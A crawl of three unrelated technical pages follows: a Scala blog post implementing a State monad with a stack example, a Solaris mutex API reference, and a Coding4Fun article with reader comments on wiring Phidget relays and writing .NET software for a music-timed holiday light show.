I believe the case pattern matching in the pop method body to be self-explanatory. Chaining the state modifications can then be achieved using both definitions of map and flatMap. The map method is helpful in transforming the result embedded in the context, producing a new state Monad taking into account the expected transformation:
def map[U](f: T => U) = new StateMonad[U, S]
while defining a flatMap method helps in simplifying the chaining of
flatMap[U](f: T => StateMonad[U,S])
How so? Simply as we did last time:
scala> import com.promindis.user._
import com.promindis.user._

scala> import Stack._
import Stack._

scala> val result = push(3).flatMap{ _ =>
     |   push(5).flatMap{_ =>
     |     push(7).flatMap{_ =>
     |       push(9).flatMap{_ =>
     |         pop.map{_ => ()}
     |       }
     |     }
     |   }
     | }
result: java.lang.Object with com.promindis.state.StateMonad[Unit,List[Int]] = com.promindis.state.StateMonad$$anon$1@124e407

scala> result(List())
res2: (Unit, List[Int]) = ((),List(7, 5, 3))
The benefit of map and flatMap becomes obvious while using more idiomatic Scala expressions like comprehensions that get interpreted as the above lines of codes:
scala> import com.promindis.user._
import com.promindis.user._

scala> import Stack._
import Stack._

scala> val result = for {
     |   _ <- push(3)
     |   _ <- push(5)
     |   _ <- push(7)
     |   _ <- push(9)
     |   _ <- pop
     | } yield ()
result: java.lang.Object with com.promindis.state.StateMonad[Unit,List[Int]] = com.promindis.state.StateMonad$$anon$1@7a6088

scala> result(List(1))
res3: (Unit, List[Int]) = ((),List(7, 5, 3, 1))
The full implementation of the StateMonad trait becomes then:
package com.promindis.state

trait StateMonad[+T, S] { owner =>
  def apply(state: S): (T, S)

  def flatMap[U](f: T => StateMonad[U, S]) = new StateMonad[U, S] {
    override def apply(state: S) = {
      val (a, y) = owner(state)
      f(a)(y)
    }
  }

  def map[U](f: T => U) = new StateMonad[U, S] {
    def apply(state: S) = {
      val (a, y) = owner(state)
      (f(a), y)
    }
  }
}

object StateMonad {
  def apply[T, S](value: T) = new StateMonad[T, S] {
    def apply(state: S) = (value, state)
  }
}
The map function produces a resulting new container instance in charge of applying the new state transformation on the transformed result from the original container instance. The typed self annotation owner, helps in referencing the original container from the apply method body of the new anonymous StateMonad instance:
owner =>
How do we extract the result from the previous container? Again, by applying the previous container itself:
val (a, y) = owner(state)
The result of the new anonymous StateMonad container will be
(f(a), y)
The body of the apply method in the container of the StateMonad instance resulting from the flatMap application will lead to:
- the application of the previous container (so as to extract the previous result and state),
- then the application of the transformation function to the result,
- and finally the application of the new StateMonad instance f(a) to the y intermediate state.

We have chained the previous container state change to the state change expected after the f function application. This whole chaining is itself transparently hosted by a containing monad.

The complete stack example can be reproduced:
package com.promindis.user

import com.promindis.state._

object Stack {
  def push[A](item: A) = new StateMonad[Unit, List[A]] {
    def apply(state: List[A]) = ((), item :: state)
  }

  def pop[A] = new StateMonad[Option[A], List[A]] {
    def apply(state: List[A]) = state match {
      case x :: xs => (Some(x), xs)
      case _ => (None, state)
    }
  }
}

object UseState {
  import Stack._

  def main(args: Array[String]) {
    val result = for {
      _ <- push(3)
      _ <- push(5)
      _ <- push(7)
      _ <- push(9)
      _ <- pop
    } yield ()
    println(result(List(1))._2)

    val otherResult = push(3).flatMap{ _ =>
      push(5).flatMap{_ =>
        push(7).flatMap{_ =>
          push(9).flatMap{_ =>
            pop.map{_ => ()}
          }
        }
      }
    }
    println(otherResult(List(1))._2)
  }
}
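For readers more comfortable outside Scala, the same state-threading machinery can be sketched in a few lines of Python. This is purely illustrative and not from the article; `State`, `flat_map`, `push` and `pop` here are my own names for the same ideas:

```python
class State(object):
    """Wraps a function run: state -> (result, new_state)."""
    def __init__(self, run):
        self.run = run

    def flat_map(self, f):
        def chained(state):
            result, intermediate = self.run(state)   # apply the previous context
            return f(result).run(intermediate)       # thread the new state along
        return State(chained)

    def map(self, f):
        # Transform the embedded result, leaving the state untouched.
        return self.flat_map(lambda a: State(lambda s: (f(a), s)))

def push(item):
    return State(lambda stack: (None, [item] + stack))

pop = State(lambda stack: (stack[0], stack[1:]) if stack else (None, stack))
```

Chaining `push(3).flat_map(lambda _: push(5).flat_map(lambda _: pop))` and running it on `[]` yields `(5, [3])`, mirroring the Scala for comprehension.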
The example works fine as in LYAH, but I am not satisfied with the result for two reasons.
Until then, I have to do a little Haskell, study the Disruptor some more, and practice some katas.
Be seeing you !!! :)
http://patterngazer.blogspot.com/2012/01/changing-my-state-of-mind-with-monad-in.html
Initializing a mutex
Destroying a mutex
Acquiring a mutex
Releasing a mutex
Trying to acquire a mutex
Use mutex_init(3C) to initialize the mutex pointed to by mp. For POSIX threads, see Initializing a Mutex.
#include <synch.h>
#include <thread.h>

int mutex_init(mutex_t *mp, int type, void *arg);
The type can be one of the following values.
USYNC_PROCESS. The mutex can be used to synchronize threads in this process and other processes. arg is ignored.
USYNC_PROCESS_ROBUST. The mutex can be used to robustly synchronize threads in this process and other processes. arg is ignored.
USYNC_THREAD. The mutex can be used to synchronize threads in this process only. arg is ignored.
When a process fails while holding a USYNC_PROCESS lock, subsequent requestors of that lock hang, which is a problem for systems that share locks with processes that can be killed abnormally. With a USYNC_PROCESS_ROBUST lock, the next requestor of a lock held by a failed process instead receives the lock, with an error return indicating that the previous owner failed while holding the mutex.
mutex_init() returns 0 if successful. When any of the following conditions is detected, mutex_init() fails and returns the corresponding value.
EFAULT
Description: mp points to an illegal address.
EINVAL
Description: The value specified by mp is invalid.
ENOMEM
Description: System has insufficient memory to initialize the mutex.
EAGAIN
Description: System has insufficient resources to initialize the mutex.
EBUSY
Description: System detected an attempt to reinitialize an active mutex.
Use
Description: mp points to an illegal address.
Use mutex_lock(3C) to lock the mutex pointed to by mp. When the mutex is already locked, the calling thread blocks until the mutex becomes available. Blocked threads wait on a prioritized queue. For POSIX threads, see pthread_mutex_lock Syntax.
#include <thread.h>

int mutex_lock(mutex_t *mp);
mutex_lock() returns 0 if successful. When any of the following conditions is detected, mutex_lock() fails and returns the corresponding value.
EFAULT
Description: mp points to an illegal address.
EDEADLK
Description: The mutex is already locked and is owned by the calling thread.
Use mutex_unlock(3C) to unlock the mutex pointed to by mp. The mutex must be locked, and the calling thread must be the thread that last locked the mutex (the owner).
#include <thread.h>

int mutex_unlock(mutex_t *mp);
mutex_unlock() returns 0 if successful. When any of the following conditions is detected, mutex_unlock() fails and returns the corresponding value.
EFAULT
Description: mp points to an illegal address.
EPERM
Description: The calling thread does not own the mutex.
Use mutex_trylock(3C) to attempt to lock the mutex pointed to by mp. This function is a nonblocking version of mutex_lock(): when the mutex is already locked, the call returns an error instead of blocking.
#include <thread.h>

int mutex_trylock(mutex_t *mp);
mutex_trylock() returns 0 if successful. When any of the following conditions is detected, mutex_trylock() fails and returns the corresponding value.
EFAULT
Description: mp points to an illegal address.
EBUSY
Description: The mutex pointed to by mp is already locked.
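The nonblocking path ("Trying to acquire a mutex" above) can be sketched with the POSIX analogue, pthread_mutex_trylock, which returns EBUSY rather than blocking when the mutex is held:

```c
#include <errno.h>
#include <pthread.h>

/* Lock a mutex, then attempt a nonblocking second acquisition.
   Returns the trylock result (EBUSY, since the mutex is held). */
int trylock_busy(void)
{
    pthread_mutex_t m;
    int rc;

    pthread_mutex_init(&m, NULL);
    pthread_mutex_lock(&m);
    rc = pthread_mutex_trylock(&m);  /* already locked: EBUSY */

    pthread_mutex_unlock(&m);
    pthread_mutex_destroy(&m);
    return rc;
}
```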
http://docs.oracle.com/cd/E18752_01/html/816-5137/sthreads-72605.html
Welcome to version 2.0 of the software and article! I have rewritten the key points of this article to address the new features in the latest version of the software. Read on for a full explanation...
New Features for 2.0
Note that any sequences created with the old version will continue to play just fine, but editing them could be troublesome due to the new timing method.
And now back to the article with updates. The hardware section remains the same, but the software discussion below is updated with new information.
I'm sure by now everyone with a computer has seen the videos of holiday light shows timed to holiday music such as this one. For this holiday season, I decided to create my own indoor show using some off-the-shelf components and .NET.
WARNING: The hardware portion of this project uses standard 120V AC current. As you are likely aware, this is enough voltage to seriously hurt or kill you. Please be careful and follow the instructions closely.
The hardware we are going to build will allow for one Phidget board to be plugged into a single AC outlet and provide 4 output outlets that can be switched off and on by the Phidget board's relays. By building two of these and placing them in a project box, I have a neat and tidy control box with 2 USB inputs, 2 AC male plugs for the wall, and 8 AC female plugs for my lights. The following description will be for building a single unit.
Let's start by preparing the extension cords. Cut the female end off of one extension cord. Split the cord up the center and strip the insulation off each of the wires to expose the ends. Twist the ends with your fingers to create a neat, twisted wire as shown:
Next, take the remaining four extension cords and cut the male ends off each. As before, split the cord up the center a small bit, strip off some insulation, and twist the exposed ends as shown:
Now, cut 4 equal lengths of your 14-16 gauge wire. These should be no longer than 2-4 inches in length. Strip some insulation off each end and twist up any loose wires.
For the next part, you will need to pay close attention. Each extension cord should have two different types of insulation around the wires. One side should have a ribbed edge, and one side should have a smooth edge shown below:
The ribbed side should be in line with the "fat" prong/receptacle (the neutral side) and the smooth side should be in line with the smaller prong/receptacle (the active/"hot" side). It is important that the next steps be followed carefully, noting which wires I am referring to. Using the wrong wire can lead to a short, blown fuses, kicked circuit breakers, or even worse things.
Take the 4 short wires you cut earlier and twist them all together along with the ribbed/neutral wire from the extension cord with the male end still attached.
Twist a wire nut over the exposed ends to keep them together and covered.
Next, twist together the smooth/"hot" wire from the four extension cords with the female ends still attached along with the smooth/"hot" wire from the extension cord with the male end attached (i.e. the other wire from the male cord used above).
Again, twist on a wire nut to keep things covered and safe.
You should now be left with the opposite ends of the 4 cut wires exposed, and the 4 ribbed/neutral wires of the female extension exposed. These will all be put into the screw terminals of the Phidget Interface Kit.
The Phidget Interface Kit board has 4 groups of screw terminals. Each group contains 3 items: NO, XC, and NC, where X is the relay number in question. These stand for "Normally Open", "Common", and "Normally Closed". For this project, the lights should normally be off and switched on via the software, so the NO (Normally Open) and XC (Common) ports will be used.
Place one wire from each exposed bundle into each NO and XC port. Note that it does not matter which wire you plug into which terminal of each group, just that each group has only one short wire and only one extension cord wire.
In the end, there will be one each of the 4 short wires in each group on the board, and one each of the extension cord wires in each group on the board as pictured:
Below is a very simple schematic of the wiring of a single board:
I decided to keep things neat and tidy and mount the Phidget boards into a project box. Since I have 2 boards to manage, I placed both inside a single, large box. I drilled holes in the short sides to expose the boards' USB ports. I then notched out some spaces on the top edge and lid for the extension cords to pass through. I mounted the boards inside the box with some carefully placed two-sided foam tape.
The finished product can be seen below:
And that's it! If this box will be placed outside, take the time to properly weatherproof the box so the elements cannot damage anything inside.
Your individual light strings will be plugged into each extension cord outlet. An average strand of mini-lights draws about .3 amps. An average string of larger bulbs will draw 1-2 amps. The relays on the Phidget board are rated at 10 amps. Additionally, a standard house circuit will allow up to 15-20 amps before overloading. Check the breaker for the circuit your outlet lives on to find its allowed amperage. Also, keep in mind that any other devices plugged into that circuit elsewhere in the house will be drawing power, so you may not be able to draw a full 15 amps from it. So, be sure not to draw more than 10A per channel, nor more than 15-20A in total, including all additional devices plugged into that circuit. Keep this in mind as you string your lights together on each channel.
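As a sanity check, the budget described above can be expressed as a quick calculation. The numbers here are illustrative (4 mini-light strands per channel across 8 channels), not a description of any particular display:

```csharp
// Illustrative load estimate against the limits discussed above:
// ~0.3 A per mini-light strand, 10 A per relay, 15-20 A per circuit.
static class LoadCheck
{
    public static (double perChannel, double total) Estimate(
        double ampsPerStrand, int strandsPerChannel, int channels)
    {
        double perChannel = ampsPerStrand * strandsPerChannel; // compare to 10 A relay rating
        double total = perChannel * channels;                  // compare to 15-20 A circuit rating
        return (perChannel, total);
    }
}

// Estimate(0.3, 4, 8) gives 1.2 A per channel and 9.6 A total,
// comfortably inside both limits.
```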
Ensure the Phidgets libraries for .NET are installed on the development machine. To compile the source code, Visual Basic and/or Visual C# Express 2005 will also need to be installed and working.
The Light Sequencer application uses a grid-style interface to show the list of channels and when each channel is switched on and off.
Squares can be toggled on or off by highlighting them, right-clicking with the mouse and selecting On or Off from the context menu. They can also be toggled by pressing the O (for on) or F (for off) keys on the keyboard.
Additionally, sequences can be "recorded" by pressing the Record button in the toolbar. This will start the music and allow the user to tap out the rhythm for each channel by pressing the number key on the keyboard corresponding to the channel.
Sequences can be saved at any time and reloaded for editing or play with the Phidgets devices connected.
When I first started the software for this project, the first problem I ran into was the fact that the DataGridView control does not support multiple headers. As shown in the screenshot above, the grid is broken down into seconds and then milliseconds. For display purposes, it is easier to break the header into two segments: one showing the labeled second markers, and one showing the subdivisions per second.
To accomplish this, I created two DataGridViews: one for the header, which contains no data and is only as tall as the header row, and one for the sub-header and the data below it. This works great except for scrolling. To keep the two grids in sync, I simply listen for the Scroll event on the main grid and apply the scrolling offset to the header grid:
Visual C#
private void dgvMain_Scroll(object sender, ScrollEventArgs e)
{
    dgvHeader.HorizontalScrollingOffset = e.NewValue;
}
Visual Basic
Private Sub dgvMain_Scroll(ByVal sender As Object, ByVal e As ScrollEventArgs) Handles dgvMain.Scroll
    dgvHeader.HorizontalScrollingOffset = e.NewValue
End Sub
Additionally, I ran into some performance issues drawing the grid. At first, drawing a grid with so many columns was quite slow. By setting the grid's Visible property to false before adding the rows and columns and then returning the Visible property to true, the grid now draws quite quickly.
The next issue tackled was starting and stopping a music file. In version 2, the software supports sampled music (MP3, WAV, etc.) as well as MIDI files. As I was attempting to write a MIDI file parser and player (so I could have access to the internal data for auto-generating a sequence) I found a fantastic MIDI library written by Leslie Sanford. This library is used by the Light Sequencer application.
With two playback libraries in place, I created an interface which contains Start, Stop, Load, etc. methods so that the front-end could use any playback engine interchangeably. The MCIPlayback engine uses standard MCI commands for playing sampled music. Commands are executed by passing them to the mciSendString function exported by winmm.dll. In order to use this function from .NET, we must import the method and setup its signature as follows:
[DllImport("winmm.dll")]
static extern Int32 mciSendString(String command, StringBuilder buffer, Int32 bufferSize, IntPtr hwndCallback);
Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal command As String, _
    ByVal buffer As StringBuilder, ByVal bufferSize As Int32, _
    ByVal hwndCallback As IntPtr) As Int32
To open a music file, the open command is used as follows:
open "<path to file>" type mpegvideo alias MediaFile
This opens the file and creates an alias named MediaFile, which can be used to refer to the file in all future commands. Sending the above command using the mciSendString method would look as follows:
string cmd = "open \"" + _musicFile + "\" type mpegvideo alias MediaFile";
mciSendString(cmd, null, 0, IntPtr.Zero);
Dim cmd As String = "open """ + file + """ type mpegvideo alias MediaFile"
mciSendString(cmd, Nothing, 0, IntPtr.Zero)
The remaining commands we will need are:
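The article's original list did not survive extraction. For the Start/Stop/Load interface described below, these would typically be the standard MCI play, stop, and close command strings, sent through the same imported function — shown here as an illustration, not the article's exact list:

```csharp
// Standard MCI command strings for the "MediaFile" alias opened above.
// (Illustrative; uses the mciSendString import declared earlier.)
mciSendString("play MediaFile", null, 0, IntPtr.Zero);   // begin playback
mciSendString("stop MediaFile", null, 0, IntPtr.Zero);   // halt playback
mciSendString("close MediaFile", null, 0, IntPtr.Zero);  // release the alias
```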
Next, the Phidget boards' behavior needed to be implemented. Talking to a Phidget board is very easy. After creating an instance of the InterfaceKit object, a specific device can be opened by calling the open method, passing in the serial number of the device to be opened.
The serial numbers for each attached Phidget device can be determined by creating an instance of the Phidgets.Manager class, setting up the Attach event handler, and listening for the attach events as follows:
...
Phidgets.Manager phidgetsManager = new Phidgets.Manager();
phidgetsManager.Attach += new AttachEventHandler(phidgetsManager_Attach);
phidgetsManager.open();
...

void phidgetsManager_Attach(object sender, AttachEventArgs e)
{
    Debug.WriteLine(e.Device.Name + " - " + e.Device.SerialNumber);
}
...
Dim phidgetsManager As New Phidgets.Manager
AddHandler phidgetsManager.Attach, AddressOf Me.phidgetsManager_Attach
phidgetsManager.open()
...

Private Sub phidgetsManager_Attach(ByVal sender As Object, ByVal e As AttachEventArgs)
    Debug.WriteLine(e.Device.Name & " - " & e.Device.SerialNumber)
End Sub
Setting the relay state is as easy as indexing into the outputs array of the InterfaceKit object and setting the indexed output to true or false.
In code, all of this would look like:
InterfaceKit ik = new InterfaceKit();
ik.open(1234);
ik.outputs[0] = true;
Dim ik As New InterfaceKit
ik.open(1234)
ik.outputs(0) = True
In order to maintain precise timing, the Stopwatch class from the System.Diagnostics namespace is used. This internally uses the QueryPerformanceCounter Win32 API method to give extremely precise time values.
When it is time to play back a sequence, a thread is started which starts the music using the appropriate playback engine and then sits in a loop, waiting for the tick interval specified in the sequence (50 ms by default) to elapse. Each time that interval passes, the channel states of the current tick are sent to the connected relays.
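A minimal sketch of that playback loop might look like the following. The class and callback names are hypothetical stand-ins, not the article's actual types; sendTick represents the code that pushes channel states out to the relays:

```csharp
using System;
using System.Diagnostics;

static class Playback
{
    // ticks[i] holds the on/off state of every channel at tick i.
    // Stopwatch (backed by QueryPerformanceCounter) keeps the schedule
    // honest even though the waiting itself is coarse.
    public static void Run(bool[][] ticks, int tickMs, Action<bool[]> sendTick)
    {
        Stopwatch sw = Stopwatch.StartNew();
        for (int i = 0; i < ticks.Length; i++)
        {
            long due = (long)i * tickMs;                  // scheduled time of tick i
            while (sw.ElapsedMilliseconds < due)
                System.Threading.Thread.Sleep(1);         // wait for the tick boundary
            sendTick(ticks[i]);                           // push states to the relays
        }
    }
}
```

Computing each tick's due time from the start of playback, rather than sleeping a fixed 50 ms per iteration, prevents small timing errors from accumulating over the length of a song.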
Recording a sequence with the keyboard works in a similar fashion. A thread is started and the music is played. While the music is playing, KeyDown and KeyUp events are listened for. After translating the KeyCode of the pressed key to a channel number, an internal array of which keys are on and off is maintained. When the elapsed milliseconds hit the appropriate mark, every channel is updated with the current value of that array, that is, which keys are up and down.
When the user stops playback, or the song ends, the channel data is returned to the main form and displayed in the main grid.
If a MIDI file is selected, sequence data is automatically generated based on the MIDI data. A MIDI file contains a series of tracks or channels with a series of commands. These commands tell the MIDI hardware what note to turn on, when, and for how long (among other things). When the MIDI file is loaded, every command from every channel is enumerated and its time values are converted into milliseconds. Once all the commands are gathered and organized, they are placed into this application's channel structure and displayed on the grid. This allows the lights to flash in precise time to the MIDI file being played.
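The tick-to-millisecond conversion mentioned above follows standard MIDI timing: the file header gives ticks per quarter note (the "division"), and tempo events give microseconds per quarter note. A sketch of the conversion, assuming a single constant tempo (the helper name is mine, not part of the MIDI library used by the article):

```csharp
static class MidiTiming
{
    // Convert a MIDI event's tick position to milliseconds.
    // ticksPerQuarter comes from the file header's division field;
    // microsecPerQuarter comes from a Set Tempo meta event
    // (500,000 us per quarter note = 120 BPM).
    public static double TicksToMilliseconds(long ticks, int ticksPerQuarter, int microsecPerQuarter)
    {
        return ticks * (microsecPerQuarter / (double)ticksPerQuarter) / 1000.0;
    }
}

// e.g. at 120 BPM (500,000 us/quarter) with a division of 480,
// tick 960 (two quarter notes in) falls at 1000 ms.
```

A real converter must walk the file and re-apply this formula at every tempo change, which is why the application enumerates every command from every channel before building its grid.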
Using the Software
Ensure that the Phidget devices you will be using are attached to the PC. Start by creating a new sequence from the File menu or by clicking the New Sequence button. In the dialog that appears, locate a music file to play back and enter the length of time that the sequence should run. Be sure to note which Phidget devices are attached and which channels they map to on the grid. Click OK when complete.
The screen will redraw and present the grid interface for the length of time specified. At this point, cells can be turned on and off by highlighting a cell and right-clicking, or by pressing the "O" key to turn the cell On, and the "F" key to turn the cell off. Multiple cells can be selected and changed at once.
To use the recording interface, click the Record Sequence button or choose Record Sequence from the Sequence menu. Be sure to select the correct choice of "Overwrite channel data" or "Append channel data." As you record additional channels, you will almost always want to append and not overwrite.
Click the start button and a brief countdown will begin. When the countdown reaches 0, the music will begin. A channel can be recorded by pressing the keyboard key of the channel number. For example, to tap out the rhythm of channel 1, press the 1 key at the appropriate times.
When complete, press the Escape key, or click the Stop button. When the Record window is closed, the main grid will be updated with the sequence recorded.
Creating a sequence is certainly a time consuming task since each channel needs to be recorded. While the rhythm interface allows one to record many channels simultaneously, I think it would be impossible for anyone to type out an entire sequence for all channels in one go. In my opinion, it is easiest to record one or two channels at a time and append the data as you go. In the end, you can use the grid interface to tweak the values and clean up any mistakes.
The sequence can be played back at any time. Simply press the Play button and watch your holiday lights play back to the timing you created. Press the Stop button to end the current playback.
Sequences can be saved at any time by selecting Save from the file menu.
To test the channels by hand, select "Test Channels" from the "Tools" menu. As with the recording screen, press the number keys associated with the channel to turn on or off to test that channel.
I found it was much easier to also have the lights plugged into the appropriate channels as I created my sequence. That way I could see the results of my recordings immediately.
To create a playlist of many sequences, select New Playlist from the File menu. Add your existing sequence files, order them as you wish, and save the playlist. From this screen you can also play the playlist, set it up to repeat, advance tracks, etc.
To edit data on an existing sequence (Phidget serial numbers, mapped MIDI channels, etc.) select Edit Sequence Properties from the Sequence menu. This will display the New Sequence dialog box and allow you to edit the existing setup.
So now that you have hardware, music and an animated sequence, it's time to hook it all up! If you are doing an indoor show, a set of external speakers should be more than ample for playing the music for your light show. For an outdoor show, you may wish to purchase an FM transmitter to output the music over a very low-powered FM frequency so that visitors can listen to the music on their car radios. I personally have not gone this route; however, you can find a variety of FM transmitters for sale around the 'net. In a quick search, I found Ramsey Electronics, which sells a variety of FM transmission hardware that is more than appropriate depending on your budget. I am certain there are plenty of other devices that fit the bill as well.
To fire up the show, just plug in your USB Phidget devices, plug the lights into the appropriate channels, load the Light Sequencer application, and press the Play button!
And there we have it! Holiday lights timed to your favorite holiday song. Take your time in creating a sequence and show us what you've created!
I plan on maintaining and updating this article as we get closer and closer to the holidays, so please check back often for updates. I will note updates at the top of the article. Additionally, please send me any and all feedback, bug reports, feature requests, or anything else you have to say! You can find my contact info in the readme.txt file located in the source code download linked above, or visit my website.
Special thanks to Michelle Leavitt for help setting up lights and sequence ideas, and my dad for advice on wiring up the relays.
Thanks to Leslie Sanford for the incredible MIDI Toolkit.
And, a big thank you to the beta testers for version 2: Allen Leno, Steve Runion, Steve Trueman, and Corey Emmert.
The Light Sequencer Program seems to give me an error when playing the example file. Do you know why?
I seen the video with the xmas lights. I thought it was bad ass.
great job!
Thank you very much for doing a terrific job of explaining everything step by step in such a clear and easy to understand way. I appreciate your work and sharing this with others. My nephew and I are going to make a sequencer for our Christmas display this year. It is an excellent opportunity to spend quality time with him doing something educational and FUN.
Can I use the PhidgetInterfaceKit 8/8/8 or 0/16/16 instead?
Sorry, you need an electrical relay to do this. I'm going to say that the 8/8/8 or the 0/16/16 couldn't support the electrical load. There are more advanced relays out there that can accommodate more inputs but you’ll have to add in support for that device.
Is there any option using phidgets to control the brightness of the lights?
I think it could be interesting to have a dimmer display with softer music, and send more power to the lights when the music calls for it.
I know I would have to code it myself, but so far I haven't been able to find if it is even possible.
I seem to have a problem with the code. After stepping through the code I can decipher it enough to tell that it does recognize that my phidget is attached. However, no device shows up on the new sequence form and I get a channels index out of range error at the first if statement of the Timer_Tick event in the record form. Your assistance with this matter would be appreciated.
Where Can i find the phidget Board In america because all the places that have them are outside of north america
After stepping through the code the software does recognize that my phidget is attached however the table on the new sequence form does not populate with my phidget info. Please advise.
@Chris, you can get them at Trossen Robotics, the link at the top of the page is actually linking to them.
it is very good. i think if it can combine with our LED cherry tree light, it will be perfect.
Latest phidget libraries (including the necessary .net libraries) can be found at:
Just need the Phidget21.msi
what web site to computeriz your lights
Do you know if they have any programs to make light shows that are Mac compatible? I am a true PC user but my PC is way older than my Mac and cannot support the program. I am really enthusiastic about trying to build a light show but I haven't found a program for Mac. Thanks!
Great!! .Net Merry Christmas!
Yeah!
Tressa: phidgets has libraries for Mac OSX, but you'd need to roll your own program.
Brian, in your notes about amperages, you have a minor error. The 10A rating is at 240V, so for a 120V application you actually have a 20A limit, but you are correct that you will need to watch that you don't overload the house circuit. Also, some houses have outdoor and garage circuits rated for up to 25A, so if you are lucky you can run a hell of a lot on this.
And as far as the 0/16/16 board, you would need relays for 120VAC lights, but not if you found some 12VDC lights. However, a 0/16/16 board and a handful of relays is much cheaper than 4 0/0/4 boards if you don't mind the extra wiring and the extra DC power source to power the relays, plus you'd be able to tap into the digital inputs and do fun things like trigger the sequence from motion detection.
Is the source code still available?
Here is a list of my current Coding4Fun articles: WiiEarthVR Animated Musical Holiday Light Show - Version
@Jeff30161 The source is at the top of the paged under the "Download" link
Can i apply the same wiring method with LED lights?
I tried 2 LED strings (35 lights each) and it caused a power-down.
Then I bypassed the controller and connected the 2 strings (sharing the same extension cord), and it still blacked out.
Did I do something wrong?
thanks
Here's an example of what you can do. It's pretty cool for the money...around $140 plus lights.
http://blogs.msdn.com/coding4fun/archive/2006/12/07/1230660.aspx